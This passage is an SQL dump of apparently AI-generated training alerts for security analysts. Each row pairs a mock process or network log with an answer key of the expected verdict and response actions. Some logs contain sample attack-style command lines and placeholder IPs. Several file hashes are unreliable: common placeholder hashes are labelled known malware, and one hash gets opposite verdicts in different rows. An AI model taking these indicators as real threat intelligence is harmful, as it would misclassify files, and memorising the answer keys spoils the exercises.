(2171, 'False Positive: Legitimate Software Update Misidentified as Malware', 'low', 'Ghidra', 'A legitimate software update was misidentified as a potential malware due to its packed nature.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.50\",\"username\":\"dlee\",\"hostname\":\"server-05\",\"command_line\":\"update.exe /silent\",\"file_hash\":\"3a5f8e9d5a2e3c6d7b3b8a3f2d9e6a5b\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of update server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f8e9d5a2e3c6d7b3b8a3f2d9e6a5b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash confirmed as benign software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The software update was mistakenly flagged due to its packed nature but is verified as legitimate.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2172, 'False Positive: Routine Network Scan Mistaken for Malicious Activity', 'low', 'Cuckoo Sandbox', 'A network scan performed by IT was misinterpreted as malicious lateral movement within the network.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"sysadmin\",\"hostname\":\"admin-console\",\"command_line\":\"nmap -sP 192.168.1.0/24\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP used by IT for network management\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sP 192.168.1.0/24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command used for routine network scanning\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The network scan was a routine operation by IT staff and not an indication of malicious activity.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2173, 'Suspicious Packed Executable Detected', 'high', 'Cuckoo Sandbox', 'A packed executable was detected attempting to execute on an internal machine. Analysis shows potential for malicious behavior.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-123\",\"command_line\":\"cmd.exe /c start C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash reported in multiple incidents\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"cmd.exe /c start C:\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of a known suspicious command\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a packed executable with known malicious hash indicates a likely malware incident.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2174, 'Malicious Macro Execution Detected', 'critical', 'Any.Run', 'An Office document with an embedded macro was executed, which connects to a known malicious C2 server.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.0.15\",\"dst_ip\":\"203.0.113.77\",\"username\":\"asmith\",\"hostname\":\"laptop-001\",\"command_line\":\"winword.exe /macro C:\\\\Users\\\\asmith\\\\malicious.docm\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for command and control activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document hash matches known malicious macro\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a malicious macro that communicates with a known C2 server confirms this as a true positive.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2175, 'Potential Malware Detected via Packed Executable', 'medium', 'Ghidra', 'A packed executable was identified with suspicious behavior, matching patterns of known malware.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.25\",\"dst_ip\":\"\",\"username\":\"mwhite\",\"hostname\":\"desktop-007\",\"command_line\":\"C:\\\\Program Files\\\\malicious_packed.exe\",\"file_hash\":\"3c4e7f33b4e7f4e5b5f9c3b4d5e8c0f0\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3c4e7f33b4e7f4e5b5f9c3b4d5e8c0f0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with packed malware variants\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\malicious_packed.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution pattern resembles malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable shows behavior consistent with known malware, warranting further investigation.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2176, 'Packed Executable Anomaly - False Positive', 'low', 'IDA Pro', 'A packed executable was identified but analysis confirmed it as a legitimate software update.', 'Malware', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:05:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.55\",\"dst_ip\":\"\",\"username\":\"lgrace\",\"hostname\":\"server-022\",\"command_line\":\"C:\\\\Updates\\\\legit_update.exe\",\"file_hash\":\"abcdef1234567890abcdef1234567890\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcdef1234567890abcdef1234567890\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this hash\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Updates\\\\legit_update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as legitimate update process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Further analysis confirmed the executable as part of a legitimate software update, leading to false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2177, 'Benign Macro Execution Mistaken for Malicious Activity', 'medium', 'Cuckoo Sandbox', 'A macro was executed from an Office document but was verified as a legitimate business process.', 'Malware', 'T1203', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.20\",\"dst_ip\":\"\",\"username\":\"bjackson\",\"hostname\":\"workstation-204\",\"command_line\":\"excel.exe /macro C:\\\\Users\\\\bjackson\\\\business_report.xlsm\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Document hash clean, associated with business processes\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"excel.exe /macro C:\\\\Users\\\\bjackson\\\\business_report.xlsm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Execution of known business macro\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro was part of a regular business process, leading to a false positive detection.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2178, 'Suspicious Packed Executable Detected in Network', 'high', 'Cuckoo Sandbox', 'A packed executable was captured and analyzed revealing a suspicious behavior pattern. The file exhibited network communication attempts to a known C2 server.', 'Malware', 'T1059.003', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.98\",\"username\":\"john.doe\",\"hostname\":\"workstation-01\",\"command_line\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\suspicious.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.98\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan.Generic by multiple AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable attempted to connect to a known malicious IP, indicating an active compromise.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2179, 'Macro-Based Malware Execution Detected', 'critical', 'Any.Run', 'A document with malicious macros was executed, leading to a download of a payload from an external server.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.20\",\"dst_ip\":\"198.51.100.12\",\"username\":\"alice.smith\",\"hostname\":\"workstation-02\",\"command_line\":\"C:\\\\Users\\\\alice.smith\\\\Documents\\\\invoice.docm\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Macro.Downloader by several AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected user\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of malicious macros led to a download from a known malicious server, confirming the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2180, 'Potential Malicious Macro Execution Flagged', 'medium', 'Ghidra', 'A document containing macros was executed, but further analysis suggests it was a benign template from a known good source.', 'Malware', 'T1203', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.25\",\"dst_ip\":\"203.0.113.15\",\"username\":\"charlie.brown\",\"hostname\":\"workstation-03\",\"command_line\":\"C:\\\\Users\\\\charlie.brown\\\\Documents\\\\report_template.docm\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected in the file hash\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.3.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user\'s machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macros were part of a legitimate template, and the hash was verified as clean.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2181, 'Suspicious Network Activity from Internal Host', 'high', 'IDA Pro', 'Unusual network connections were made from an internal host to multiple unknown external IPs, potentially indicating a scanning activity.', 'Lateral Movement', 'T1049', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"david.johnson\",\"hostname\":\"workstation-04\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the scanning host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple scanning activities\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The connection pattern matches known reconnaissance techniques, suggesting lateral movement attempts.\"}', 'Intermediate', 'MAL', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2182, 'False Positive: Internal Network Scan Alert', 'low', 'Cuckoo Sandbox', 'An internal scan alert was triggered due to a legitimate network assessment being conducted by authorized personnel.', 'Lateral Movement', 'T1049', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.5.50\",\"dst_ip\":\"192.168.5.51\",\"username\":\"network_admin\",\"hostname\":\"security-tool\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the scanning tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.51\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The scan was part of a scheduled network assessment by the IT team, confirming no malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2183, 'Packed Executable Detected via Cuckoo Sandbox Analysis', 'high', 'Cuckoo Sandbox', 'A packed executable was detected and analyzed, revealing malicious behavior indicative of a malware infection. The executable attempted to connect to a known malicious IP for command and control.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.101\",\"username\":\"jdoe\",\"hostname\":\"compromised-host\",\"command_line\":\"malicious.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malware C2 servers\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware family\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file packed, common in malicious activities\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable\'s network activity and file behavior confirmed malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2184, 'Suspicious Macro Detected in Document via Any.Run', 'critical', 'Any.Run', 'A document containing a suspicious macro was executed, leading to the download of additional malicious payloads. This indicates an ongoing malware infection attempt.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:47:29Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.42\",\"username\":\"asmith\",\"hostname\":\"office-pc\",\"command_line\":\"winword.exe /macro payload.docm\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing and malware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash related to a known malicious macro\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"winword.exe /macro payload.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro execution in Office document, often used in attacks\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the affected user\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro\'s behavior and communication with a known malicious IP confirm the attack.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2185, 'Ghidra Analysis Reveals Obfuscated Malware Behavior', 'medium', 'Ghidra', 'A binary analyzed with Ghidra shows obfuscation techniques commonly used by malware to avoid detection. The binary attempts to execute suspicious scripts.', 'Malware', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:12:54Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.150\",\"dst_ip\":\"203.0.113.77\",\"username\":\"mjohnson\",\"hostname\":\"developer-workstation\",\"command_line\":\"obfuscation.exe\",\"file_hash\":\"098f6bcd4621d373cade4e832627b4f6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP used in phishing and malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"098f6bcd4621d373cade4e832627b4f6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File hash linked to obfuscated malware samples\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"obfuscation.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable employs obfuscation, a common malware technique\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the developer\'s workstation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The obfuscation techniques and network activity confirm the presence of malware.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2186, 'Benign Activity Misclassified as Malware via IDA Pro', 'low', 'IDA Pro', 'A benign application was flagged due to its use of packing techniques similar to those used by malware, but further analysis revealed no malicious intent.', 'Malware', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"10.0.0.10\",\"username\":\"kwhite\",\"hostname\":\"packaging-server\",\"command_line\":\"safe_application.exe\",\"file_hash\":\"4621d373cade4e832098f6bcd4b6b8e5\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"4621d373cade4e832098f6bcd4b6b8e5\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash verified as a known clean application\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"safe_application.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Executable verified as safe with no malicious behavior\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the packaging server\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the network\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The application\'s packing techniques are legitimate, resulting in a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2187, 'Cuckoo Sandbox False Positive on Legitimate Software Update', 'low', 'Cuckoo Sandbox', 'A software update process was mistakenly flagged as malicious due to network behavior typical of update processes, but no malicious activity was found.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:03:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.20\",\"dst_ip\":\"10.0.10.5\",\"username\":\"rsmith\",\"hostname\":\"update-server\",\"command_line\":\"update.exe\",\"file_hash\":\"6bcd4621d373cade4e832098f6b8e5f0\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"6bcd4621d373cade4e832098f6b8e5f0\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash recognized as a legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command typical of software updates, confirmed harmless\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the update server\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.10.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for update distribution\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Network traffic was consistent with legitimate update distribution.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2188, 'Suspicious Packed Executable Detected', 'high', 'Cuckoo Sandbox', 'A packed executable was detected executing from an unusual directory with signs of obfuscation. Reverse engineering tools suggest potential for malware.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.76\",\"username\":\"jdoe\",\"hostname\":\"workstation123\",\"command_line\":\"C:\\\\Temp\\\\packed_executable.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash reported in multiple malware repositories\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in several malware distribution activities\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable and associated external IP are flagged as malicious, indicating a potential 